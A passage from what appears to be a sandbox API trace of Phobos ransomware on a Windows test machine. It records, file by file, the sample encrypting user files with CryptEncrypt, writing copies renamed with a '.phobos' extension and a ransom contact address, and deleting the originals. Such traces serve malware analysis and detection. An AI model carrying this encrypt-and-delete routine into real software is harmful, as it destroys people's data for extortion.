halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@www.bing[2].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0194.641] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0194.641] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0194.641] ReadFile (in: hFile=0x154, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xd7, lpOverlapped=0x0) returned 1 [0194.642] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xe0, dwBufLen=0xe0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xe0) returned 1 [0194.642] WriteFile (in: hFile=0x180, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xe0, lpOverlapped=0x0) returned 1 [0194.643] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ae8) returned 1 [0194.643] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0194.643] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x70, dwBufLen=0x70 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x70) returned 1 [0194.643] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0194.643] WriteFile (in: hFile=0x180, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x122, lpOverlapped=0x0) returned 1 [0194.643] CryptDestroyKey (hKey=0xa327e8) returned 1 [0194.643] CloseHandle (hObject=0x154) returned 1 [0194.643] CloseHandle (hObject=0x180) returned 1 [0194.643] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.bing[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@www.bing[2].txt")) returned 1 [0194.644] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0194.644] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.linkedin[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@www.linkedin[1].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0194.644] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=169) returned 1 [0194.645] CloseHandle (hObject=0x180) returned 1 [0194.645] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.linkedin[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@www.linkedin[1].txt")) returned 0x2020 [0194.645] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.linkedin[1].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@www.linkedin[1].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0194.645] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.linkedin[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@www.linkedin[1].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0194.645] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0194.645] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0194.645] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.linkedin[1].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@www.linkedin[1].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0194.645] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0194.645] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0194.645] ReadFile (in: hFile=0x180, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xa9, lpOverlapped=0x0) returned 1 [0194.646] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xb0, dwBufLen=0xb0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xb0) returned 1 [0194.646] WriteFile (in: hFile=0x154, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xb0, lpOverlapped=0x0) returned 1 [0194.647] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ae8) returned 1 [0194.647] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0194.647] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x80, dwBufLen=0x80 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x80) returned 1 [0194.647] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0194.647] WriteFile (in: hFile=0x154, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x132, lpOverlapped=0x0) returned 1 [0194.647] CryptDestroyKey (hKey=0xa327e8) returned 1 [0194.647] CloseHandle (hObject=0x180) returned 1 [0194.647] CloseHandle (hObject=0x154) returned 1 [0194.647] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.linkedin[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@www.linkedin[1].txt")) returned 1 [0194.648] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0194.648] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.msn[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@www.msn[2].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0194.661] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=1026) returned 1 [0194.661] CloseHandle (hObject=0x154) returned 1 [0194.661] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.msn[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@www.msn[2].txt")) returned 0x2020 [0194.661] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.msn[2].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@www.msn[2].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0194.661] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.msn[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@www.msn[2].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0194.661] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0194.661] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0194.661] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.msn[2].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@www.msn[2].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0194.662] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0194.662] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0194.662] ReadFile (in: hFile=0x154, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x402, lpOverlapped=0x0) returned 1 [0194.708] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x410, dwBufLen=0x410 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x410) returned 1 [0194.708] WriteFile (in: hFile=0x180, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x410, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x410, lpOverlapped=0x0) returned 1 [0194.711] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32c68) returned 1 [0194.711] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0194.711] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x70, dwBufLen=0x70 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x70) returned 1 [0194.711] CryptDestroyKey (hKey=0xa32c68) returned 1 [0194.711] WriteFile (in: hFile=0x180, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x122, lpOverlapped=0x0) returned 1 [0194.711] CryptDestroyKey (hKey=0xa327e8) returned 1 [0194.711] CloseHandle (hObject=0x154) returned 1 [0194.712] CloseHandle (hObject=0x180) returned 1 [0194.712] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.msn[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@www.msn[2].txt")) returned 1 [0194.712] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0194.713] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\libraries\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0194.713] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=274) returned 1 [0194.713] CloseHandle (hObject=0x180) returned 1 [0194.713] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\libraries\\desktop.ini")) returned 0x6 [0194.713] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\libraries\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0194.713] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\libraries\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0194.715] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0194.715] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0194.715] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\libraries\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0194.716] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0194.717] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0194.717] ReadFile (in: hFile=0x180, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x112, lpOverlapped=0x0) returned 1 [0194.717] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x120, dwBufLen=0x120 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x120) returned 1 [0194.717] WriteFile (in: hFile=0x154, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x120, lpOverlapped=0x0) returned 1 [0194.718] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32c68) returned 1 [0194.718] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0194.718] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0194.718] CryptDestroyKey (hKey=0xa32c68) returned 1 [0194.718] WriteFile (in: hFile=0x154, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0194.719] CryptDestroyKey (hKey=0xa327e8) returned 1 [0194.719] CloseHandle (hObject=0x180) returned 1 [0194.719] CloseHandle (hObject=0x154) returned 1 [0194.719] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\libraries\\desktop.ini")) returned 1 [0194.720] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0194.720] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\privacie\\index.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0194.721] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=32768) returned 1 [0194.722] CloseHandle (hObject=0x154) returned 1 [0194.722] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\privacie\\index.dat")) returned 0x2026 [0194.722] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\index.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\privacie\\index.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0194.722] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\privacie\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0194.722] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0194.722] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0194.722] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\index.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\privacie\\index.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0194.723] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0194.723] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0194.723] ReadFile (in: hFile=0x154, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x8000, lpOverlapped=0x0) returned 1 [0194.747] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x8010, dwBufLen=0x8010 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x8010) returned 1 [0194.747] WriteFile (in: hFile=0x180, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x8010, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x8010, lpOverlapped=0x0) returned 1 [0194.748] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32a28) returned 1 [0194.748] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0194.748] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0194.748] CryptDestroyKey (hKey=0xa32a28) returned 1 [0194.748] WriteFile (in: hFile=0x180, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0194.748] CryptDestroyKey (hKey=0xa327e8) returned 1 [0194.749] CloseHandle (hObject=0x154) returned 1 [0194.749] CloseHandle (hObject=0x180) returned 1 [0194.749] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\privacie\\index.dat")) returned 1 [0194.750] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0194.750] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\privacie\\low\\index.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0194.751] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=114688) returned 1 [0194.751] CloseHandle (hObject=0x180) returned 1 [0194.751] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\privacie\\low\\index.dat")) returned 0x2026 [0194.751] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\index.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\privacie\\low\\index.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0194.751] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\privacie\\low\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0194.751] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 